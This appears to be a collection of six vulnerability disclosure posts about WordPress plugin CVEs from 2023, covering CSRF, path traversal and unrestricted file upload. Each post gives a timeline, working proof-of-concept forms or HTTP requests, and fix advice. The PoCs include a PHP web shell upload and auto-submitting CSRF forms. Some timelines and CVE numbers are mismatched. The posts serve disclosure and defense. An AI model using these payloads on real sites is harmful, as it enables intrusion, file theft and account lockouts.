Author: Dmitrii I

During testing of the plugin, a CSRF vulnerability was discovered in action=rename, which can lead to denial of service and theft of the password from the database, thereby allowing an attacker to get inside the web application and gain a foothold in it. Replace any data in the database and do everything that an administrator can do. After logging into the database, he can create a new user and attach a hashed password to it. And through the administrator to implement RCE remote code execution

Main info:

CVE	CVE-2023-4827
Plugin	File Manager Pro
Critical	Very High
Publicly Published	September 12, 2023
Last Updated	September 12, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A2: Broken Authentication and Session Management
PoC	Yes
Exploit	Will be later
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4827 https://wpscan.com/vulnerability/d4daf0e1-8018-448a-964c-427a355e005f
Plugin Security Certification by CleanTalk

Timeline

August 25, 2023	Plugin testing and vulnerability detection in the File Manager Pro access plugin have been completed
August 25, 2023	I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
September 8, 2023	The author has released a fix update
September 8, 2023	Registered CVE-2023-4827

Discovery of the Vulnerability

In the ever-evolving landscape of web security, the discovery of vulnerabilities is a critical aspect of keeping online systems safe. Recently, a noteworthy vulnerability, identified as CVE-2023-4827, was uncovered in File Manager Pro, specifically in versions prior to 1.8. This vulnerability poses a significant risk to web applications utilizing this plugin.

The vulnerability was first identified during a routine security assessment of the File Manager Pro plugin. It was categorized as a Cross-Site Request Forgery (CSRF) vulnerability, which, when exploited, could lead to remote code execution (RCE) on the affected web application.

Understanding of CSRF attack’s

Before delving into the specifics of this vulnerability, it’s crucial to understand what CSRF is and how it operates. CSRF, or Cross-Site Request Forgery, is a type of attack where an attacker tricks a user into executing actions on a web application without their consent. Essentially, it involves the exploitation of a user’s authenticated session to perform actions without their knowledge.

To illustrate this, imagine a scenario where an authenticated user is tricked into clicking a seemingly innocent link on a malicious website. This link sends a request to a target web application where the user is logged in, executing actions as if they initiated them themselves.

Exploiting the CSRF

In the case of CVE-2023-4827, the vulnerability was discovered in the “action=rename” feature of File Manager Pro. This vulnerability allows an attacker to craft a malicious CSRF request that forces an authenticated user to rename a file. While this may seem relatively benign at first glance, it has the potential for devastating consequences.

By exploiting this CSRF vulnerability, an attacker can initiate a series of actions leading to a remote code execution (RCE) scenario. They can gain control over the web application, potentially extracting sensitive information from the database, altering data, or even creating new users with hashed passwords. The attacker can effectively assume the privileges of an administrator and manipulate the application as they see fit.

POC html code:

<html> 

  <body> 

  <script>history.pushState(”, ”, ‘/’)</script> 

    <form action=”http://127.0.0.1/wordpress/wp-admin/admin-ajax.php”> 

      <input type=”hidden” name=”action” value=”fs&#95;connector” /> 

      <input type=”hidden” name=”cmd” value=”rename” /> 

      <input type=”hidden” name=”name” value=”wp&#45;config&#46;txt” /> 

      <input type=”hidden” name=”target” value=”l1&#95;d3AtY29uZmlnLnBocA” /> 

      <input type=”submit” value=”Submit request” /> 

    </form> 

    <script> 

      document.forms[0].submit(); 

    </script> 

  </body> 

</html>

Potential Risks and Real-World Impact

The potential risks associated with this vulnerability are significant. In a real-world scenario, an attacker could use CSRF to exploit File Manager Pro, gain access to a web application’s database, and compromise its security. They could then exfiltrate sensitive data, modify critical settings, or inject malicious code, potentially causing data breaches or service disruptions. Moreover, the attacker could establish persistent access, allowing them to maintain control over the application, leading to long-term security concerns.

Recommendations for Improved Security

To mitigate the risk associated with CVE-2023-4827 and similar CSRF vulnerabilities, several security measures should be considered:

1. Update and Patch: It is crucial to keep all software, including plugins and themes, up to date. Developers often release patches to address security vulnerabilities.
2. CSRF Protection: Implement robust CSRF protection mechanisms, such as anti-CSRF tokens, to ensure that requests are only executed when initiated by legitimate users.
3. Security Audits: Regular security audits and penetration testing can help identify and address vulnerabilities before they can be exploited.
4. Least Privilege Principle: Restrict user privileges to the minimum required for their tasks to limit potential damage in the event of a breach.
   
   

In conclusion, CVE-2023-4827 serves as a stark reminder of the importance of maintaining vigilance in the ever-evolving landscape of cybersecurity. By understanding CSRF and taking proactive steps to secure web applications, developers and administrators can minimize the risks associated with such vulnerabilities and protect their systems from potential exploitation.

#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #VeryHighVulnerability

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.

Check my website

During a security assessment of the FileOrganizer plugin, a medium vulnerability was uncovered in versions up to and including 1.0.2. This vulnerability allows an attacker to manipulate the plugin’s root folder, potentially compromising the security of the entire system. The plugin does not restrict functionality on multisite instances, allowing site admins to gain full control over the server.

Main info:

CVE	CVE-2023-3664
Plugin	FileOrganizer
Critical	Medium
Publicly Published	September 3, 2023
Last Updated	September 3, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A5: Broken Access Control
PoC	Yes
Exploit	Will be later
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3664 https://wpscan.com/vulnerability/d59e6eac-3ebf-40e0-800c-8cbef345423f
Plugin Security Certification by CleanTalk

Timeline

July 11, 2023	Plugin testing and vulnerability detection in the FileOrganizer access plugin have been completed
July 12, 2023	I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
September 3, 2023	The author has not released an update
September 3, 2023	Registered CVE-2023-3664

Discovery of the Vulnerability

During testing, it was discovered that it is possible to change the root folder that the plugin will read and show information to the user. Usually in such plugins there is a restriction on exiting the /var/www/html directory, but in this plugin the root folder can be changed to any operating system directory like /home. And you can also perform the same actions using Path Traversal /var/www/html/../../../etc or /home and so on

Understanding of Path Traversal attack’s

Path Traversal is a type of vulnerability that occurs when an application allows users to navigate outside the intended directory structure. In the case of FileOrganizer, the plugin lacks proper validation, enabling an attacker to traverse directories beyond the expected boundaries.

For instance, if the plugin expects files to be within the /var/www/html directory, an attacker can use path traversal techniques to access directories like /home, /etc, or even ../../../../../, which could lead to unauthorized access to sensitive files and system resources.

Exploiting the Path Traversal

Exploiting this vulnerability involves crafting malicious requests that contain directory traversal sequences, such as “../” or “%2e%2e%2f”, to trick the plugin into accessing files and directories outside its intended scope. This allows the attacker to view, modify, or exfiltrate sensitive files.

POC:

1. Go to settings page of this plugin

2. Change directory to /home or you can use Path Traversal /var/www/html/../../../home or /var/www/html/wordpress/../../../../etc

3. Then navigate to the page of plugin

4. You will be able to list the files/folders outside of WordPress root directory

Potential Risks and Real-World Impact

The impact of this vulnerability is significant:

1. Unauthorized Data Access: Attackers can access and potentially steal sensitive files, including configuration files, user data, and other confidential information.
2. System Compromise: An attacker could use this vulnerability to compromise the entire system, execute arbitrary code, or manipulate critical files.
3. Data Loss: Files may be deleted, altered, or accessed without authorization, leading to data loss and system instability.

Recommendations for Improved Security

To mitigate the risks associated with CVE-2023-3664 and enhance the security of the FileOrganizer plugin, the following measures are strongly advised:

1. Regular Updates: Keeping software, applications, and plugins up to date helps patch known vulnerabilities that attackers could exploit for Path Traversal.
2. Input Validation: Implement thorough input validation and sanitization to prevent path traversal attacks and unauthorized file access.
3. Access Controls: Implement proper access controls to restrict file access based on user privileges.
4. Web Application Firewalls (WAFs) and Security Plugins: Implementing WAFs or Security Plugins can help detect and prevent Path Traversal attempts by filtering malicious inputs. You can use a very powerful and multifunctional Security & Malware scan by CleanTalk, which will protect your site from such attacks and your site will always be readable
   
   

By addressing the path traversal vulnerability in the FileOrganizer plugin and following these security recommendations, website owners can significantly reduce the likelihood of security breaches and protect the integrity of their data and systems.

#WordPressSecurity #PathTraversal #WebsiteSafety #StayProtected #MediumVulnerability

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.

Check my website

A severe security loophole has come to light in the Prevent files / folders access plugin, triggering concerns over the safety of WordPress websites. This vulnerability, tracked as CVE-2023-4238, opens the door to remote code execution through file uploads. Our testing revealed a startling scenario: an attacker can potentially upload a PHP file to the private directory at /wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory.

The plugin’s inclusion of a function for privilege elevation is noteworthy. If an attacker obtains < Admin privileges, they could exploit ordinary users to facilitate this unauthorized upload.

Main info:

CVE	CVE-2023-4238
Plugin	Prevent files / folders access
Critical	Very High
Publicly Published	August 31, 2023
Last Updated	August 31, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A05: Security Misconfiguration
PoC	Yes
Exploit	Will be later
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4238 https://wpscan.com/vulnerability/53816136-4b1a-4b7d-b73b-08a90c2a638f
Plugin Security Certification by CleanTalk

Timeline

July 13, 2023	Plugin testing and vulnerability detection in the Prevent files / folders access plugin have been completed
July 13, 2023	I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
August 27, 2023	The author has released a fix update
August 31, 2023	Registered CVE-2023-4238

Discovery of the Vulnerability

During our meticulous examination of the plugin, we identified a critical flaw that exposes websites to remote code execution. This vulnerability allows an attacker to upload malicious PHP files to a specific directory, providing a gateway for executing arbitrary commands on the target system.

Understanding of Remote Code Execution attack’s

Remote Code Execution (RCE) is a sophisticated cyber attack that poses significant threats to the security of software applications, web servers, and online platforms. This type of attack enables malicious actors to execute arbitrary code on a target system, often leading to a complete compromise of the system’s functionality and data.

How Remote Code Execution Works:

1. Vulnerability Exploitation: RCE attacks typically exploit vulnerabilities in an application’s code, often resulting from poor input validation, inadequate user authentication, or insecure configurations. Attackers seek ways to inject their own malicious code into the target system.
2. Command Execution: Once the attacker succeeds in injecting malicious code, they can execute arbitrary commands on the target system. These commands might include shell commands, operating system functions, or other actions that can compromise the system’s security.
3. Unauthorized Access: RCE allows attackers to gain unauthorized access to the server environment, enabling them to manipulate files, databases, and other resources. This unauthorized access can result in data breaches, data loss, and unauthorized control of the system.

Exploiting the Remote Code Execution

In the context of the Prevent files / folders access plugin, an attacker can exploit the lack of proper validation and restrictions on file uploads. By injecting malicious PHP code into a file, they can upload it to the private directory. Upon execution, this file can trigger unauthorized commands, thereby compromising the entire web application.

POC:

1) Need to go to /wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory

2) Then upload a file with the php extension

3) Follow the link http://your_host/wordpress/wp-content/uploads/protectedfiles/{filename}.php

POC request:

POST /wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory HTTP/1.1

Host: your_host

User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://your_host/wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory

Content-Type: multipart/form-data; boundary=—————————1997636327839669212858654260

Content-Length: 748

Origin: http://your_host

Connection: close

Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1689481588%7Cyy6JhGzsFzCgNGZrPBtXmLggeJYWnERQGSgti68YGZK%7C778d0436fcf72095251ba6a1f0020fe28af9d706771d93c24bc4fdd5e96ab3c0; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1689481588%7Cyy6JhGzsFzCgNGZrPBtXmLggeJYWnERQGSgti68YGZK%7C5b4086f33c562500a9c62e1028af758fe8630a9991847cf93ff7a1265c9d9777; wp-settings-1=libraryContent%3Dbrowse%26siteorigin_panels_setting_tab%3Dwelcome; wp-settings-time-1=1689308788

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

—————————–1997636327839669212858654260

Content-Disposition: form-data; name=”mo_media_restriction_file_upload_field”

cff450153b

—————————–1997636327839669212858654260

Content-Disposition: form-data; name=”_wp_http_referer”

/wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory

—————————–1997636327839669212858654260

Content-Disposition: form-data; name=”fileToUpload”; filename=”cmd.php”

Content-Type: application/x-php

<?php system($_GET[‘cmd’]); ?>

—————————–1997636327839669212858654260

Content-Disposition: form-data; name=”option”

mo_media_restriction_file_upload

—————————–1997636327839669212858654260–

Potential Risks and Real-World Impact

The gravity of this vulnerability cannot be understated. An attacker who successfully leverages this RCE vulnerability gains the ability to execute operating system commands, potentially leading to the complete compromise of the web application, data theft, and unauthorized control of the server environment.

1. Data Breaches: Attackers can exfiltrate sensitive data from compromised systems. This might include personal information, financial data, proprietary business information, and more.
2. System Compromise: RCE attacks can lead to complete control of the target system. Attackers can modify files, install malware, and even escalate their privileges to gain control over the entire server.
3. Malicious Payload: Attackers can deliver payloads that create backdoors or install malware, allowing them to maintain persistent access to the compromised system even after the initial attack.

Recommendations for Improved Security

To mitigate the risks associated with CVE-2023-4238 and enhance overall security, we strongly recommend the following measures:

1. Regular Updates: Keeping software, applications, and plugins up to date helps patch known vulnerabilities that attackers could exploit for RCE.
2. Input Validation: Thoroughly validate and sanitize all user inputs to prevent injection attacks and unauthorized code execution.
3. Secure Coding Practices: Developers should follow secure coding practices, use proper input validation, avoid executing user-supplied code, and implement principle of least privilege.
4. Web Application Firewalls (WAFs) and Security Plugins: Implementing WAFs or Security Plugins can help detect and prevent RCE attempts by filtering malicious inputs. You can use a very powerful and multifunctional Security & Malware scan by CleanTalk, which will protect your site from such attacks and your site will always be readable
5. User Education: Educate users about the risks of executing code from untrusted sources and encourage them to avoid opening suspicious emails or downloading files from unknown sources.
   
   

By addressing the RCE vulnerability in the Prevent files / folders access plugin and following these security recommendations, website owners can significantly reduce the likelihood of security breaches and protect the integrity of their web applications.

#WordPressSecurity #RemoteCodeExecution #WebsiteSafety #StayProtected #VeryCriticalVulnerability

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.

Check my website

In the pursuit of robust website security, a profound vulnerability has emerged during the assessment of WordPress plugins. A striking vulnerability within the Lock User Account plugin was discovered, heralding a serious threat. This vulnerability exposes an avenue for malicious attackers to enact an untraceable lockout of all user accounts, capitalizing on a Cross-Site Request Forgery (CSRF) vulnerability.

Main info:

CVE	CVE-2023-4307
Plugin	Lock User Account
Critical	High
Publicly Published	August 21, 2023
Last Updated	August 21, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A2: Broken Authentication and Session Management
PoC	Yes
Exploit	No
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4307 https://wpscan.com/vulnerability/06f7aa45-b5d0-4afb-95cc-8f1c82f6f8b3
Plugin Security Certification by CleanTalk

Timeline

August 4, 2023	Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed
August 4, 2023	I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
August 12, 2023	The author has removed his plugin from WordPress library
August 22, 2023	Registered CVE-2023-4307

Discovery of the Vulnerability

In the process of testing the plugin, which makes it possible to block the account of any user, a CSRF vulnerability was found, which allows the administrator to block all accounts when clicking on a malicious link. At the same time, the administrator will not know about it. There is no _wpnonce check in the plugin

Understanding of CSRF attack’s

Cybercriminals can craft a malicious link that, when clicked by an unwitting administrator, invokes unauthorized actions within the Lock User Account plugin. The impact is astounding – the attacker can swiftly lock all user accounts without the administrator’s knowledge. The lack of an essential _wpnonce check in the plugin facilitates this alarming exploit. CSRF – OWASP TOP-10

Exploiting the CSRF vulnerability

Administrators unknowingly executing the malicious link could inadvertently freeze every WordPress user’s account. The implications are severe, rendering the website inaccessible to users and disrupting the digital ecosystem.

POC html code:

<html>

  <body>

  <script>history.pushState(”, ”, ‘/’)</script>

    <form action=”http://your_site/wordpress/wp-admin/users.php”>

      <input type=”hidden” name=”s” value=”” />

      <input type=”hidden” name=”action” value=”lock” />

      <input type=”hidden” name=”new&#95;role” value=”” />

      <input type=”hidden” name=”paged” value=”1″ />

      <input type=”hidden” name=”users&#91;0&#93;” value=”1″ />

      <input type=”hidden” name=”users&#91;1&#93;” value=”2″ />

      <input type=”hidden” name=”users&#91;2&#93;” value=”3″ />

      <input type=”hidden” name=”users&#91;3&#93;” value=”4″ />

      <input type=”hidden” name=”action2″ value=”lock” />

      <input type=”hidden” name=”new&#95;role2″ value=”” />

      <input type=”submit” value=”Submit request” />

    </form>

    <script>

      document.forms[0].submit();

    </script>

  </body>

</html>

P.s. YOU CAN ADD ANY OTHER INPUT DATA WITH THE NAME=”USERS” AND THE VALUE=”YOUR_MAX_USERS_NUMBER”

Potential Risks and Real-World Impact

The CSRF vulnerability within the Lock User Account plugin introduces grave risks and potential scenarios:

1. Unauthorized Account Blocking:
   An attacker could craft a malicious link and trick the administrator into clicking on it unknowingly. This would lead to the administrator unintentionally blocking all user accounts on the website.
   
2. Mass Account Disruption:
   As all user accounts get blocked, it could lead to a mass disruption of user access to the website. This might cause significant inconvenience to users and damage the reputation of the website.
   
3. Denial of Service (DoS):
   By blocking all accounts, the website may effectively experience a DoS situation, preventing legitimate users from accessing their accounts and using the website’s services.

Recommendations for Improved Security

Safeguard your WordPress environment against CVE-2023-4019 and fortify your digital stronghold:

• Delete plugin:
  Since the plugin has been removed from the wordpress library, it is necessary to remove it. Current version will be vulnerable to this attack
  
• Implement _wpnonce Verification::
  Enhance the plugin’s defenses by incorporating robust _wpnonce verification. This step acts as a formidable barrier against CSRF attacks, thwarting unauthorized actions.
  
• Regular Security Audits:
  Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
  
• Educate Administrators:
  Educate administrators about the nature of CSRF attacks and the importance of cautious clicking. Raising awareness among your team can prevent inadvertent actions that could compromise site security.
  
  

By disseminating this crucial information throughout the WordPress community, we can collectively bolster the security of countless websites. Share this knowledge to ensure that administrators are well-equipped to defend against the CVE-2023-4307 vulnerability and to maintain the safety of their WordPress sites.

#WordPressSecurity #CSRFVulnerability #WebsiteProtection #StayInformed

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.

Check my website

In a profound exploration of WordPress plugins, a chilling revelation has come to light. During meticulous testing, a high-impact vulnerability was unearthed within the Media from FTP plugin, specifically versions preceding 11.17. This alarming flaw exposes an avenue for attackers to exploit Path Traversal techniques, enabling unauthorized access to sensitive files and documents. The plugin does not properly limit who can use the plugin, which may allow users with author+ privileges to move files around, like wp-config.php, which may lead to RCE in some cases.

Main info:

CVE	CVE-2023-4019
Plugin	Media from FTP
Critical	High
Publicly Published	August 14, 2023
Last Updated	August 14, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A5: Broken Access Control
PoC	Yes
Exploit	Will be later
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4019 https://wpscan.com/vulnerability/0d323b07-c6e7-4aba-85bc-64659ad0c85d
Plugin Security Certification by CleanTalk

Timeline

July 26, 2023	Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed
July 26, 2023	I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
July 31, 2023	The author has released a fix update
August 14, 2023	Registered CVE-2023-4019

Discovery of the Vulnerability

During testing of the plugin, a vulnerability was discovered in the mediafromftp-update-ajax-action, which allows downloading local folders outside of /var/www/html, which gives attackers a huge potential. They can download any local files in the media and then view them for example /etc/passwd, /etc/hosts and other local files/documents. This is possible on behalf of a user with Author rights. By default, the Author is not authorized to view local files and it cannot interact with them directly, viewing local files is very critical for the application owner. To eliminate this vulnerability, I ask you to validate the path that the user enters and if it does not contain a root directory, then do forbidden

Understanding of Path Traversal attack’s

Path Traversal, a notorious hacking technique, is at the core of this vulnerability. It involves manipulating file paths to breach directory boundaries and access files beyond the intended scope. Malicious actors exploit this to access files and directories that are otherwise restricted. Path Traversal OWASP TOP-10

Exploiting the Path Traversal vulnerability

Exploiting the CVE-2023-4019 vulnerability empowers attackers to venture outside the restricted directory of /var/www/html. This enables them to download local files, even those residing in sensitive system directories.

POC:

1) Go to /wordpress/wp-admin/admin.php?page=mediafromftp-search-register

2) Select any file from the media text list below

3) Click “Update Media”

4) Intercept request with action=mediafromftp-update-ajax-action

5) Сhange new_url to local dir like /etc/passwd or /etc/hosts

POC request:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1

Host: your_host

User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=mediafromftp-search-register

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 123

Origin: http://your_host

DNT: 1

Connection: close

Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1690606171%7CfCvhmGhE1pXZ9e5sGp38GZd5KqlrcKsCvkhWuFVd7g9%7Cb8692eb78cc5aa5fb9911291a78d34a0e04461ed834d1ca96b121cf1ef714aff; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1690606171%7CfCvhmGhE1pXZ9e5sGp38GZd5KqlrcKsCvkhWuFVd7g9%7C1fe25db056c3038ca9accd05f2608008d9db007ec3d7b37572208454e3f62357; wp-settings-time-2=1690433465

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-origin

action=mediafromftp-update-ajax-action&nonce=9c0c0115ee&maxcount=1&new_url=/etc/passwd&new_datetime=2023-07-10+20%3A53%3A36

Potential Risks and Real-World Impact

The Path Traversal vulnerability within the Media from FTP plugin introduces grave risks and potential scenarios:

1. Data Exposure:
   Attackers can access and potentially download sensitive files containing confidential information, jeopardizing data privacy and integrity.
   
2. Malicious Use of Stolen Data:
   Extracted data from unauthorized file access could be used maliciously, undermining the integrity of the entire system.
   
3. System Disruption:
   Access to sensitive files could lead to unintended modifications, potentially disrupting the functioning of the WordPress installation.

Recommendations for Improved Security

Safeguard your WordPress environment against CVE-2023-4019 and fortify your digital stronghold:

• Immediate Plugin Update:
  Upgrade the Media from FTP plugin to version 11.17 or above. This update addresses the Path Traversal vulnerability and enhances security.
  
• Input Validation:
  Developers should incorporate robust input validation mechanisms to ensure that user-provided data is sanitized and restricted to authorized directories.
  
• Regular Security Audits:
  Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
  
• Path Validation:
  Implement robust path validation mechanisms to ensure that user-entered paths remain within the authorized directory scope.
  
  

Empower the WordPress community with the knowledge of CVE-2023-4019. Share this article far and wide to ensure website owners take proactive measures against this critical vulnerability.

#WordPressSecurity #PathTraversalVulnerability #WebsiteSafety #StayProtected

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.

Check my website

In the realm of WordPress plugins, a severe security vulnerability has been unveiled. A comprehensive testing process revealed a critical flaw within the Advanced File Manager plugin, specifically versions up to 5.1.1. This vulnerability exposes a significant security lapse that can potentially allow unauthorized access to files and folders through Path Traversal techniques.

Main info:

CVE	CVE-2023-3814
Plugin	Advanced File Manager
Critical	High
Publicly Published	August 14, 2023
Last Updated	August 14, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A5: Broken Access Control
PoC	Yes
Exploit	Will be later
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3814 https://wpscan.com/vulnerability/ca954ec6-6ebd-4d72-a323-570474e2e339
Plugin Security Certification by CleanTalk

Timeline

July 13, 2023	Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed
July 13, 2023	I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
August 9, 2023	The author has released a fix update
August 14, 2023	Registered CVE-2023-3814

Discovery of the Vulnerability

During testing, it was discovered that it is possible to change the root folder that the plugin will read and show information to the user. Usually in such plugins there is a restriction on exiting the /var/www/html directory, but in this plugin the root folder can be changed to any operating system directory like /home. And you can also perform the same actions using Path Traversal /var/www/html/../../../etc or /home and so on

Understanding of Path Traversal attack’s

Path Traversal is a hacking technique that involves manipulating file paths to access files and directories beyond the intended scope. Hackers can exploit this vulnerability to break out of the restricted directory and gain access to sensitive files and directories residing in other parts of the system. Path Traversal OWASP TOP-10

Exploiting the Path Traversal vulnerability

Exploiting this Path Traversal vulnerability within the Advanced File Manager plugin could empower attackers to change the root folder, allowing them to view, access, and potentially download files from locations that are off-limits under normal circumstances.

POC:

1. Go to settings page (/wordpress/wp-admin/admin.php?page=file_manager_advanced_controls)

2. In the “Public Root Path” setting, change directory to /home or you can use Path Traversal /var/www/html/../../../home or /var/www/html/wordpress/../../../../etc

3. Then navigate to the page of plugin (/wordpress/wp-admin/admin.php?page=file_manager_advanced_ui#elf_l1_Lw)

4. You will be able to list the files/folders outside of WordPress root directory

Potential Risks and Real-World Impact

The Path Traversal vulnerability within the Advanced File Manager plugin introduces grave risks and potential scenarios:

1. Data Exposure:
   Attackers can access and potentially download sensitive files containing confidential information, jeopardizing data privacy and integrity.
   
2. Malicious Code Injection to OS folder’s:
   By manipulating file paths, hackers may insert malicious code into system files, leading to the compromise of the entire website.
   
3. Escalation of Privileges:
   Exploiting this vulnerability could provide attackers with unauthorized administrative access, leading to unauthorized control and manipulation of the WordPress environment.

Recommendations for Improved Security

To fortify your WordPress website against the CVE-2023-3814 vulnerability and enhance overall security, consider implementing the following preventive measures:

• Immediate Plugin Update:
  Upgrade to Advanced File Manager plugin version 5.1.2 or higher. This update addresses the Path Traversal vulnerability and strengthens security.
  
• Input Validation:
  Developers should incorporate robust input validation mechanisms to ensure that user-provided data is sanitized and restricted to authorized directories.
  
• Regular Security Audits:
  Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
  
• User Awareness:
  Educate administrators about the risks of clicking on unknown links or visiting suspicious websites, emphasizing the importance of vigilance.
• 
  

By addressing the Path Traversal vulnerability within the Advanced File Manager plugin and adhering to these security recommendations, you can safeguard your WordPress website from unauthorized file and folder access, mitigating potential breaches and preserving the confidentiality of your data.

#WordPressSecurity #PathTraversalVulnerability #WebsiteSafety #StayProtected

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.

Check my website